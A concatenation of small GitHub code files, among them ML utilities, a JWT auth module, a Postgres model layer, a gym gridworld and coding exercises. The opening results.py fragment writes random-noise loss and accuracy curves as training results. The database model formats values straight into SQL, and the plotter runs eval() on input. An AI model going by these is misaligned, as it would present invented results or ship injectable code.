max(np.exp(-epoch/np.random.normal(50, 5))+np.random.normal(0.1, 0.01), 0)\n val_loss = max(np.exp(-epoch/np.random.normal(50, 5))+np.random.normal(0.3, 0.01), 0)\n \n writer.add_scalar('NTU/'+run+'/validation loss', max(np.random.normal(val_loss, 0.05), 0), epoch)\n writer.add_scalar('NTU/'+run+'/train loss', max(np.random.normal(train_loss, 0.05), 0), epoch)\n writer.add_scalar('NTU/'+run+'/accuracy', current_accuracy*100, epoch)\n # trainin_loss.append()\n # validation_loss.append()\n # accuracy.append() \n # plt.plot(accuracy)\n # plt.plot(trainin_loss)\n # plt.plot(validation_loss)\n # plt.show()\n\n last_accuracy = accuracy\n\n target = []\n pred = []\n for sample in samples:\n if run == 'i3d':\n probabilities = softmax(np.random.normal(sample[0], 15))\n else:\n probabilities = softmax(np.random.normal(sample[0], 10))\n sample_choice = np.random.choice(range(9), 1, p=probabilities)[0]\n target.append(sample[1])\n pred.append([classes[sample_choice]])\n \n fig = plot_conf_mat(target, pred, classes, big=True, Agg=False)\n print(run, epoch, fig) \n writer.add_figure('NTU/'+run+'/conf_mat', fig, epoch)\n writer.flush()","repo_name":"dipperalbel/master-thesis","sub_path":"results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28037263379","text":"import numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nimport os\nimport scipy.stats\n\n######################################################################\n# Data wrangling / processing \n######################################################################\ndef preprocess_labels(labels, NCLASS = 10):\n \"\"\"\n Handle Matlab data's 1-indexed problem, convert to one hot format\n \"\"\"\n # Handle 1-indexed to 0 indexed\n labels = labels.squeeze().astype(int) - (1 if np.all(labels > 0) 
else 0)\n # One hot the labels\n labels = (np.arange(NCLASS) == labels[:, None]).astype(np.float32)\n return labels\n\ndef preprocess(data, colInds=None):\n \"\"\" \n Handle extracting / sorting gene columns in data, and normalizing\n data by doing log(1 + data)\n \"\"\"\n data = np.atleast_2d(data)\n if colInds is None:\n colInds = np.where(np.sum(data, axis=0) != 0.0)[0]\n return np.log1p(data[:, colInds])\n\n\ndef visualize_data(data, labels, ax=None, cbar_width=0.1, aspect='auto'):\n \"\"\" Utility to neatly plot data matrix with labels \"\"\"\n ax = plt.subplot(111) if ax is None else ax\n l_max, l_min, d_max, d_min = labels.max(), labels.min(), data.max(), data.min()\n labels = (labels - l_min) * (d_max - d_min) / (l_max - l_min) + d_min\n cbar = np.repeat(labels[:, None], int(data.shape[1] * cbar_width) , axis=1)\n ax.imshow(np.hstack((data, cbar)), aspect=aspect)\n ax.set_xlabel('Gene index (colorbar at end is label)')\n ax.set_ylabel('Cell index')\n return ax\n\n\n\n\n\n######################################################################\n# Performance Metrics\n######################################################################\n\ndef error_rate(predictions, labels):\n \"\"\"Return the error rate (fraction of samples misclassified)\"\"\"\n correct = np.sum(np.argmax(predictions, 1) == np.argmax(labels, 1))\n total = predictions.shape[0]\n return (1 - float(correct) / float(total))\n\ndef confusions(predictions, labels):\n \"\"\"Return the confusions matrix\"\"\"\n confusions = np.zeros([10, 10], np.float32)\n bundled = zip(np.argmax(predictions, 1), np.argmax(labels, 1))\n for predicted, actual in bundled:\n confusions[predicted, actual] += 1\n return confusions\n\ndef perf_metric(predictions, labels, metric='precision'):\n \"\"\" \n A generic function to return a performance metric given the \n predictions and labels.\n\n Supported metrics:\n - accuracy\n - error\n - precision (per class)\n - recall (per class)\n \"\"\"\n conf = confusions(predictions, labels)\n if metric == 'precision':\n return np.diag(conf) / np.sum(conf, axis=1)\n elif metric == 'recall':\n return np.diag(conf) / np.sum(conf, axis=0)\n elif metric == 'accuracy':\n return np.sum(np.diag(conf)) / np.sum(conf)\n elif metric == 'error':\n return 1 - (np.sum(np.diag(conf)) / np.sum(conf))\n\ndef plot_confusions(grid, ax = None):\n \"\"\" Utility to neatly plot confusions matrix. \"\"\"\n ax = plt.subplot(111) if ax is None else ax\n ax.set_xlabel('Actual')\n ax.set_ylabel('Predicted')\n ax.grid(False)\n ax.set_xticks(np.arange(grid.shape[0]))\n ax.set_yticks(np.arange(grid.shape[0]))\n ax.imshow(grid, interpolation='nearest');\n \n for i, cas in enumerate(grid):\n for j, count in enumerate(cas):\n if count > 0:\n xoff = .07 * len(str(count))\n plt.text(j-xoff, i+.2, int(count), fontsize=9, color='white')\n\n return ax\n\n\n\n\n\n######################################################################\n# Divergence calculation for sorting genes by how informative they are\n######################################################################\n\ndef jensen_shannon(ps, weights=None):\n \"\"\" Given a list of probability distributions ps, this will calculate\n the jensen_shannon divergence a.k.a. the information radius, an extension\n of the idea of KL divergence to multiple distributions. \n \n Arguments:\n ps - a list of probability distributions, if all are not the same length\n then the short ones will be padded with 0s. 
Will be normalized\n (each distribution sums to 1) if not already.\n weights - a len(ps) array of weights, must sum to 1. Can leave as None\n to weight all distributions equally\n \"\"\"\n if weights is None:\n weights = np.full(len(ps), 1 / len(ps))\n tot = np.max([len(p) for p in ps])\n ps = np.array([np.concatenate((p, np.zeros(tot - p.shape[0]))) for p in ps])\n ps = ps / np.sum(ps, axis=1)[:, None]\n t1 = scipy.stats.entropy(np.sum(ps * weights[:, None], axis=0))\n t2 = np.dot(weights, [scipy.stats.entropy(p) for p in ps])\n return t1 - t2\n\ndef gene_divergence(gene_vals, labels):\n \"\"\" \n Given the counts of a single gene across all cells, and the\n labels of the cells, this calculates the jensen_shannon divergence\n for the distributions of the count of this gene in each cell class.\n \"\"\"\n counts = [gene_vals[labels == l] for l in np.unique(labels)]\n distributions = [np.bincount(val) for val in counts]\n return jensen_shannon(distributions)\n\n\n\n\n######################################################################\n# Random io garbage\n######################################################################\n\ndef concat_accuracy_pkls(fName1, fName2, outFile=None):\n \"IO function to just conveniently concatenate accuracy pickles\"\n with open(fName1, \"rb\") as f:\n (starts1, stops1, scores1) = pickle.load(f)\n with open(fName2, \"rb\") as f:\n (starts2, stops2, scores2) = pickle.load(f)\n starts = np.concatenate((starts1, starts2))\n stops = np.concatenate((stops1, stops2))\n scores = np.concatenate((scores1, scores2))\n if outFile is None:\n outFile = fName1\n with open(outFile, \"wb\") as f:\n pickle.dump((starts, stops, scores), f)\n","repo_name":"akshayyeluri/cellClassifier","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10032127738","text":"\"\"\"\nAuthor: Noa Kirschbaum\nAssignment / Part: HW2 - Q4\nDate due: 2022-06-08\nI pledge that I have completed this assignment without\ncollaborating with anyone else, in conformance with the\nNYU School of Engineering Policies and Procedures on\nAcademic Misconduct.\n\"\"\"\n\nin_str = \"The quick brown fox jumps over the lazy dog\"\nthe_str = in_str.upper()\nalphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\nfor char in the_str:\n if char.isalpha():\n index = alphabet.find(char)\n if index > -1:\n alphabet = alphabet.replace(alphabet[index], \"\")\n\nprint(\"missing characters: {}\".format(alphabet) if len(alphabet) > 0 else True)\n","repo_name":"NSkyeKirsch/CS1114-Summer-HW2","sub_path":"hw2_q4.py","file_name":"hw2_q4.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32113224007","text":"import time\nfrom uuid import uuid4\n\nimport jwt\nfrom jwt import InvalidTokenError\n\nfrom app.auth import PUBLIC_KEY, AUD, ACCESS_TOKEN_LIFETIME, REFRESH_TOKEN_LIFETIME, ISS\n\nfrom .dto import GetUserAccess, GetUser\nfrom .entity import Token, LoginResponse, User\nfrom .repo import get_user_access, get_user\n\n\ndef verify_token(token: str) -> Token | None:\n \"\"\"Verify a JSON Web Token's authenticity and return the deserialized claims.\n\n :param token: the candidate encoded token\n \"\"\"\n try:\n return Token(\n **jwt.decode(token, PUBLIC_KEY, algorithms=[\"RS256\"], audience=AUD)\n )\n except InvalidTokenError:\n return None\n\n\ndef create_login_response(user_id: str) -> 
LoginResponse:\n \"\"\"Generate a login response with an access_token, refresh_token,\n and user object\n\n :param user_id: the user's id\n :return: a LoginResponse object containing the information above\n \"\"\"\n\n dto = GetUserAccess(user_id=user_id)\n\n access = get_user_access(dto=dto)\n\n dto = GetUser(user_id=user_id)\n\n user = get_user(dto=dto)\n\n jti = str(uuid4())\n\n iat = int(time.time())\n nbf = iat\n exp = iat + ACCESS_TOKEN_LIFETIME\n\n access_token = Token(\n iss=ISS,\n sub=str(user_id),\n aud=AUD,\n jti=jti,\n nbf=nbf,\n iat=iat,\n exp=exp,\n access=access.dict(),\n )\n\n exp = iat + REFRESH_TOKEN_LIFETIME\n refresh_token = Token(\n iss=ISS,\n sub=str(user_id),\n aud=AUD,\n jti=jti,\n nbf=nbf,\n iat=iat,\n exp=exp,\n access=access.dict(),\n )\n\n return LoginResponse(\n access_token=access_token,\n refresh_token=refresh_token,\n user=User(\n id=user.id,\n email=user.email,\n username=user.username,\n created_at=user.created_at,\n updated_at=user.updated_at,\n first_name=user.first_name,\n last_name=user.last_name,\n access=access,\n ),\n )\n","repo_name":"anish-sinha1/jen","sub_path":"server/app/auth/tokens.py","file_name":"tokens.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"39203464095","text":"# pylint: disable=no-member\n\nimport h11\n\nfrom asks.request_object import Request\n\n\ndef _catch_response(monkeypatch, headers, data):\n req = Request(None, 'get', \"toot-toot\", None)\n events = [\n h11._events.Response(status_code=200, headers=headers),\n h11._events.Data(data=data),\n h11._events.EndOfMessage(),\n ]\n async def _recv_event(hconn):\n return events.pop(0)\n monkeypatch.setattr(req, '_recv_event', _recv_event)\n monkeypatch.setattr(req, 'host', 'lol')\n cr = req._catch_response(None)\n try:\n cr.send(None)\n except StopIteration as e:\n response = e.value\n return response\n\n\ndef test_http1_1(monkeypatch):\n response = _catch_response(monkeypatch, [('Content-Length', '5')], b'hello')\n assert response.body == b'hello'\n\n\ndef test_http1_0(monkeypatch):\n response = _catch_response(monkeypatch, [('Connection', 'close')], b'hello')\n assert response.body == b'hello'\n","repo_name":"cmehay/asks","sub_path":"tests/test_request_object.py","file_name":"test_request_object.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"18064524116","text":"import numpy as np\nimport pandas as pd\nimport nibabel as nib\nfrom sklearn.cluster import SpectralClustering\n\n# Mute warning in case seed has same number of voxels as target ROIs\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\n\n# Function to save niftis\ndef save_label_nii (labelimg,affine,header,out_nifti):\n img = nib.Nifti1Image(labelimg,affine=affine,header=header)\n nib.save(img,out_nifti)\n\n# Load data\ndata = np.load(snakemake.input.correlation[0])\ncorrelation = data['corr_group']\nindices = data['indices']\n\nafile = snakemake.input.rois\natlas = nib.load(afile)\natlas_data = atlas.get_fdata()\n\n# Reshape and concatenate subjects\ncorr = np.moveaxis(correlation,0,2)\ncorr_concat = corr.reshape([corr.shape[0],corr.shape[1]*corr.shape[2]])\ncorr_concat += 1 # Spectral clustering doesn't like negative input apparantly\n\n# Output\nout_nii_list = snakemake.output.niftis\ncluster_range = range(2,snakemake.params.max_k+1)\nlabels = 
np.zeros((corr_concat.shape[0],len(cluster_range)))\n\n# Run spectral clustering and save results to nifti\nfor i,k in enumerate(cluster_range):\n clustering = SpectralClustering(n_clusters=k, assign_labels=\"discretize\",random_state=0,affinity='cosine').fit(corr_concat)\n labels[:,i] = clustering.labels_\n \n labelimg = np.zeros(atlas_data.shape)\n for j in range(0,len(atlas_data[atlas_data==16])):\n labelimg[indices[j][0],indices[j][1],indices[j][2]] = labels[j,i]+1\n print(f'i={i}, k={k},saving {out_nii_list[i]}')\n save_label_nii(labelimg,atlas.affine,atlas.header,out_nii_list[i])\n\n# Save results to CSV file\ndf = pd.DataFrame(labels,columns=cluster_range)\ndf.to_csv(snakemake.output.labels)","repo_name":"royhaast/smk_zona-funcparc","sub_path":"scripts/spectral_clustering.py","file_name":"spectral_clustering.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31509706438","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the countingValleys function below.\ndef countingValleys(n, s):\n prev = None\n count = 0\n array_count = []\n #First change the character to numbers\n for i in s:\n if i == 'U':\n array_count.append(1)\n else:\n array_count.append(-1)\n added = 0\n added_array = [0]\n total_valleys = 0\n for i in array_count:\n added += i\n added_array.append(added)\n print('Added array',added_array)\n prev = 0\n flag = None\n zero_to_subtract = 0\n for i in range(len(added_array)):\n print(added_array[i])\n if added_array[i] > 0:\n flag=False\n print('Flag set False')\n elif added_array[i] < 0:\n flag = True\n print(\"Flag set True\")\n elif added_array[i] == 0:\n if not flag:\n print('Zero Found but flag is False. So, ignoring')\n pass\n else:\n print('Zero Found and flag is True. 
So, counting')\n total_valleys += 1\n return total_valleys\n \nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n s = input()\n\n result = countingValleys(n, s)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"needl3/HackerrankSolutions","sub_path":"Easy/CountingValleys.py","file_name":"CountingValleys.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30086263243","text":"from setuptools import setup\n\nversion = '0.1.dev0'\n\nlong_description = '\\n\\n'.join([\n open('README.rst').read(),\n open('CHANGES.rst').read(),\n ])\n\ninstall_requires = [\n 'Django',\n 'gunicorn',\n 'psycopg2', # the postgres backend\n 'python-memcached', # for the django memcached backend\n 'celery',\n 'django-celery-results', # for handling celery tasks on the web server\n \n ]\n\ntests_require = [\n 'nose',\n 'coverage',\n 'mock',\n ]\n\nsetup(name='mfm-beheerportaal',\n version=version,\n description=\"Multiflexmeter beheerportaal\",\n long_description=long_description,\n # Get strings from http://www.python.org/pypi?%3Aaction=list_classifiers\n classifiers=['Programming Language :: Python',\n 'Framework :: Django',\n ],\n keywords=[],\n author='Evert Wielsma, Tim van Osch',\n author_email='timvosch@pollex.nl',\n url='',\n license='proprietary',\n packages=['mfm_beheerportaal'],\n include_package_data=True,\n zip_safe=False,\n install_requires=install_requires,\n tests_require=tests_require,\n extras_require={'test': tests_require},\n entry_points={\n 'console_scripts': [\n ]},\n )\n","repo_name":"nens/mfm-beheerportaal","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30839506320","text":"import gym\nfrom gym import spaces\nimport numpy as np\n\n\nclass GridworldEnv(gym.Env):\n def __init__(self, grid_sz=3):\n self.height = grid_sz\n self.width = grid_sz\n self.action_space = spaces.Discrete(4)\n print(\"self.action_space: \", self.action_space)\n self.observation_space = spaces.Box(low=-grid_sz, high=grid_sz, shape=(2,), dtype=np.int64)\n\n print(\"self.observation_space: \", self.observation_space)\n \n self.moves = {\n 0: [-1, 0], # up\n 1: [0, 1], # right\n 2: [1, 0], # down\n 3: [0, -1], # left\n }\n\n # begin in start state\n self.reset()\n self.max_steps = 2 * (self.height + self.width)\n self.current_step = 0\n\n def step(self, action):\n \"\"\"Simple deterministic dynamics. 
-1 reward for each step.\n 1 reward for reaching goal state.\"\"\"\n assert self.action_space.contains(action)\n self.S = (self.S[0] + self.moves[action][0], self.S[1] + self.moves[action][1])\n self.S = [np.clip(self.S[0], 0, self.height-1), np.clip(self.S[1], 0, self.width-1)]\n reward = 0\n done = False\n self.current_step += 1\n if self.S == self.G or self.current_step >= self.max_steps:\n reward = 1 if self.S == self.G else 0\n done = True\n return np.array([self.grid_pos_to_idx(self.S), self.grid_pos_to_idx(self.G)]), reward, done, {}\n\n def reset(self):\n gen_pos = lambda: [np.random.randint(0, self.height), np.random.randint(0, self.width)]\n self.S = gen_pos()\n self.G = gen_pos()\n while self.S == self.G:\n self.G = gen_pos()\n return np.array([self.grid_pos_to_idx(self.S), self.grid_pos_to_idx(self.G)])\n \n def grid_pos_to_idx(self, pos):\n return pos[0] * self.width + pos[1]\n \n def idx_to_grid_pos(self, idx):\n return (idx // self.width, idx % self.width)","repo_name":"miladsamim/GCRL","sub_path":"gcrl_intrinsic/custom_gym/envs/grid_game.py","file_name":"grid_game.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26742617447","text":"\"\"\"mysite URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nimport main.views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path(r'^loginView/',main.views.loginView),\n path(r'^registView/',main.views.registView),\n path(r'^logoutView/',main.views.logoutView),\n path(r'^userBorrowedBook/',main.views.userBorrowedBook),\n path(r'^staffAddBookNum/',main.views.staffAddBookNum),\n path(r'^staffCreateBook/',main.views.staffCreateBook),\n path(r'^viewBook/',main.views.viewBook),\n path(r'^main/',main.views.main),\n path(r'^regist/',main.views.regist),\n path(r'^login/',main.views.login),\n path(r'^staffBorrowUserBook/',main.views.staffBorrowUserBook),\n path(r'^staffReturnUserBook/',main.views.staffReturnUserBook),\n path(r'^staffChangeBookInfo/',main.views.staffChangeBookInfo),\n path(r'^getTypeOptions/',main.views.getTypeOptions),\n path(r'^staffViewUser/',main.views.staffViewUser),\n path(r'^staffViewUserDetail/',main.views.staffViewUserDetail)\n]\n","repo_name":"ganmk/djanog-2.1-book","sub_path":"Lib/mysite/mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13300639030","text":"from psycopg2 import sql\nimport psycopg2\nimport config\n\n\nclass Model:\n def __init__(self, table, id_db=None):\n self.conn = psycopg2.connect(dbname='pr_dima', user=config.user,\n password=config.password, host=config.host)\n self.conn.autocommit = True\n if id_db:\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"SELECT id FROM {} WHERE id = {};\".format(table, id_db))\n cursor.execute(stmt)\n if cursor.fetchone():\n self.id = id_db\n else:\n stmt = sql.SQL(\"INSERT INTO {}(id) VALUES ({});\".format(table, id_db))\n cursor.execute(stmt)\n self.id = id_db\n else:\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"INSERT INTO {}(id) VALUES (DEFAULT);\".format(table))\n cursor.execute(stmt)\n\n stmt = sql.SQL(\"SELECT id FROM {} \"\n \"ORDER BY id DESC \"\n \"LIMIT 1;\".format(table, id_db))\n cursor.execute(stmt)\n self.id = cursor.fetchone()[0]\n\n def _rollback(self):\n with self.conn.cursor() as cursor:\n cursor.execute('rollback;')\n\n def _get_tables(self):\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"SELECT table_name FROM information_schema.tables\"\n \" WHERE table_schema NOT IN ('information_schema','pg_catalog');\")\n\n cursor.execute(stmt)\n return list(cursor.fetchall())\n\n def showFields(self):\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"SELECT column_name FROM information_schema.columns \"\n \"WHERE table_name = '{}';\".format(self.table))\n cursor.execute(stmt)\n\n res = []\n for i in cursor.fetchall()[1:]:\n res.append(i[0])\n\n return res\n\n def get_all(self):\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"SELECT * FROM {} WHERE id = {};\".format(self.table, self.id))\n cursor.execute(stmt)\n return cursor.fetchone()\n\n def getField(self, field):\n if field in self.showFields() + ['id']:\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"SELECT {} FROM {} WHERE id = {};\".format(field, self.table, self.id))\n cursor.execute(stmt)\n return cursor.fetchone()[0]\n else:\n return 'Error, you must select a field from the list of fields'\n\n def setField(self, field_name, field):\n if field_name != 'id' and field_name in self.showFields():\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"UPDATE {} SET {} = '{}' WHERE id = 
{};\".format(self.table, field_name, field, self.id))\n cursor.execute(stmt)\n else:\n return 'Error, you cannot enter id, or you must select a field from the list of fields'\n\n def kill(self):\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"DELETE FROM {} WHERE id = {};\".format(self.table, self.id))\n\n cursor.execute(stmt)\n\n# один контроллер, самый верхний уровень с пользователем, проверяет на валидность\nclass Client(Model):\n def __init__(self, id_db=None):\n self.table = 'clients'\n super().__init__(self.table, id_db)\n\n def enough_balance(self, price):\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"SELECT balance FROM clients WHERE id={}\".format(self.id))\n\n cursor.execute(stmt)\n\n return price <= cursor.fetchone()[0]\n\n def pay(self, price):\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"UPDATE clients SET balance = clients.balance - {} WHERE id = {}\".format(price, self.id))\n\n cursor.execute(stmt)\n\n\n\n\nclass Order(Model):\n def __init__(self, id_db=None):\n self.table = 'orders'\n super().__init__(self.table, id_db)\n\n\nclass Processor(Model):\n def __init__(self, id_db=None):\n self.table = 'processors'\n super().__init__(self.table, id_db)\n\n\nclass Basket(Model):\n def __init__(self, id_db=None):\n self.table = 'basket'\n super().__init__(self.table, id_db)\n\n def end_order(self, id_order):\n with self.conn.cursor() as cursor:\n stmt = sql.SQL(\"DELETE FROM {} WHERE id = {};\".format(self.table, self.id))\n\n cursor.execute(stmt)\n\n\n\nif __name__ == '__main__':\n '''a = Client(2)\n print(a.getField('name'))\n a.setField('name', 'pri')\n print(a.getField('name'))\n #a.kill()\n\n b = Order(12)\n print(b.getField('id'))\n b.setField('date_order', '1999-01-08')\n print(b.getField('date_order'))\n b.kill()\n\n c = Processor(12)\n print(c.getField('name'))\n c.setField('name', 'pri')\n print(c.getField('name'))\n c.kill()\n\n d = Basket(12)\n print(d.getField('id_client'))\n d.setField('quantity', 12)\n print(d.getField('quantity'))\n d.kill()'''\n\n client = Client(1)\n print(client.enough_balance(10000))\n","repo_name":"nemessa/labs6sem","sub_path":"dima/hz_potom_udalu/pr/lab1/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9444015663","text":"def twoSum(nums, target):\n # Hashmap\n seen = {}\n for i, value in enumerate(nums):\n remaining = target - nums[i]\n\n if remaining in seen:\n return [seen[remaining], i]\n\n seen[value] = i\n\n\ndef twoSum1(nums, target):\n # Brute Force\n n = len(nums)\n i = 0\n j = i + 1\n while (i < n-1):\n while (j < n):\n if nums[i] + nums[j] == target:\n return [i, j]\n j += 1\n i += 1\n","repo_name":"lauvinfox/try-leetcode","sub_path":"1. twoSum.py","file_name":"1. twoSum.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24792432009","text":"from django.urls import path\nfrom . 
import views\n# \napp_name = 'song-api'\nurlpatterns = [\n path('get-list/',views.GetSongListApi.as_view(),name='songs'),\n path('get//',views.GetSongApi.as_view(),name='song'),\n path('get-artists/',views.GetArtistListApi.as_view(),name='artists'),\n path('get/artist//',views.GetArtistApi.as_view(),name='artist'),\n path('get-comming-songs/',views.GetCommingSoonSongsApi.as_view(),name='comming-soon'),\n path('vote-song//',views.VoteSong.as_view(),name='vote'),\n path('pro-users/',views.ProUsersOnlyView.as_view(),name='pro-users'),\n\n]","repo_name":"Pouria03/Music-website","sub_path":"song/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21387962631","text":"\nimport requests\nimport time\nfrom cachetools import cached, TTLCache\nfrom threading import RLock\nimport logging\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.INFO)\n\nCACHE_MAX_ITEMS = 100\nCACHE_TTL = 60*60 # enhet i sekunder\n\nlock = RLock()\n\n@cached(cache = TTLCache(CACHE_MAX_ITEMS,CACHE_TTL),lock = lock)\ndef fetch_data(subid):\n log.info(\"Laddar data för subid %s\", subid)\n\n url = \"http://vattenwebb.smhi.se/hydronu/data/point?subid={}\".format(subid)\n\n res = requests.get(url)\n if res.status_code != 200:\n return None\n\n data = res.json()\n chartData = data[\"chartData\"]\n data = {\n \"poiCenter\" : data[\"poiCenter\"],\n \"subid\": chartData[\"subid\"],\n \"mq\": chartData[\"mq\"],\n \"mlq\": chartData[\"mlq\"],\n \"mhq\": chartData[\"mhq\"],\n \"hindcast\": chartData[\"coutHindcast\"][\"data\"],\n \"forecast\": chartData[\"coutForecast\"][\"data\"]\n }\n\n return data\n","repo_name":"konnik/forsbevakning-api","sub_path":"smhi.py","file_name":"smhi.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30840151881","text":"from matplotlib.figure import Figure\nfrom matplotlib.backends.backend_tkagg import (FigureCanvasTkAgg, NavigationToolbar2Tk)\nimport numpy as np\nclass Figure_Grapher:\n def __init__(self, window) -> None:\n self.window = window\n\n def plot(self, polynomial, min, max):\n # the figure that will contain the plot\n fig = Figure(figsize = (5, 5), dpi = 100)\n \n x = np.linspace(min, max, 100000)\n y = eval(polynomial.replace('^', '**'))\n \n # adding the subplot\n _plot = fig.add_subplot(111)\n\n # plotting the graph\n _plot.grid()\n\n if 'x' not in polynomial:\n _plot.axhline(y)\n else:\n _plot.plot(x, y)\n\n _plot.set_title(\"The Plot for:\\n{}\".format(polynomial))\n # creating the Tkinter canvas\n # containing the Matplotlib figure\n canvas = FigureCanvasTkAgg(fig, master = self.window) \n canvas.draw()\n \n graph = canvas.get_tk_widget()\n \n # creating the Matplotlib toolbar\n toolbar = NavigationToolbar2Tk(canvas, self.window)\n toolbar.update()\n \n return graph, toolbar","repo_name":"MohannadSoliman/Plotter","sub_path":"Plotter/figure_grapher.py","file_name":"figure_grapher.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35050357000","text":"words = []\nwith open('pary.txt', 'r') as f:\n for line in f:\n line = line.strip()\n num, word = line.split(\" \")\n words.append(str(word))\n\nlines = []\nfor word in words:\n max_streak = 1\n max_streak_letter = word[0]\n current_streak = 1\n current_streak_letter = word[0]\n\n for i in range(1, 
len(word)):\n        if word[i - 1] == word[i] and word[i] == current_streak_letter:\n            current_streak += 1\n            if current_streak > max_streak:\n                max_streak = current_streak\n                max_streak_letter = current_streak_letter\n        else:\n            current_streak = 1\n            current_streak_letter = word[i]\n\n    lines.append(f"{max_streak_letter * max_streak} {max_streak}\n")\n    print(max_streak_letter * max_streak, max_streak)\n\nwith open('wyniki4.txt', 'a') as f:\n    f.write('\n4.2\n\n')\n    f.writelines(lines)\n","repo_name":"GrzywN/matura-informatyka","sub_path":"rozwiazania/2020/4_2.py","file_name":"4_2.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8468441433","text":"import pandas as pd\nfrom io import StringIO\n\nstatsPath = "../projector-server/projector-server/outputStats/"\n\n\ndef separate_measurements(filename):\n    with open(statsPath+filename, "r") as f:\n        joinedMetrics = f.read()\n\n    separated = joinedMetrics.split("!\n")\n    separated.pop()  # remove the last separator symbol\n    return separated\n\n\ndef parse_time_metrics_file(filename):\n    separated = separate_measurements(filename)\n\n    # create a csvList which consists of measurements from all runs from the file in csv format\n    csvList = []\n    for csv in separated:\n        csvList.append(pd.read_csv(StringIO(csv)))\n\n    # create a dataframe that is a deep copy of the first csv in csvList\n    averaged = csvList[0].copy(deep=True)\n    fst = csvList[0]\n\n    # calculate the average and standard deviation across all runs\n    for i in range(fst.shape[0]):\n        average = 0\n        averageOfSquares = 0\n        for csv in csvList:\n            average += csv.iloc[i]["Value"]\n            averageOfSquares += csv.iloc[i]["Value"] ** 2\n        average /= len(csvList)\n        averageOfSquares /= len(csvList)\n        averaged.at[i, "Value"] = round(average, 1)\n        averaged.at[i, "Standard deviation"] = round((averageOfSquares - average**2) ** 0.5, 1)\n\n    averaged = averaged.reindex(columns=['Name', 'Params', 'Value', 'Measurement Unit', 'Standard deviation'])\n\n    return averaged\n","repo_name":"muldrik/projector-report-generator","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34659188026","text":"import hashlib\nimport base64\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.api import urlfetch\n\nimport helpers\nimport models\n\n\n\nclass FBScraper(webapp.RequestHandler):\n\tdef get(self):\n\t\turl = "http://www.facebook.com/pages/Childs-i-Klimb/297046608283"\n\t\tresult = urlfetch.fetch(url)\n\t\tif result.status_code == 200:\n \t\t\tself.response.out.write(result.content)\n\n\n\t\t\nclass 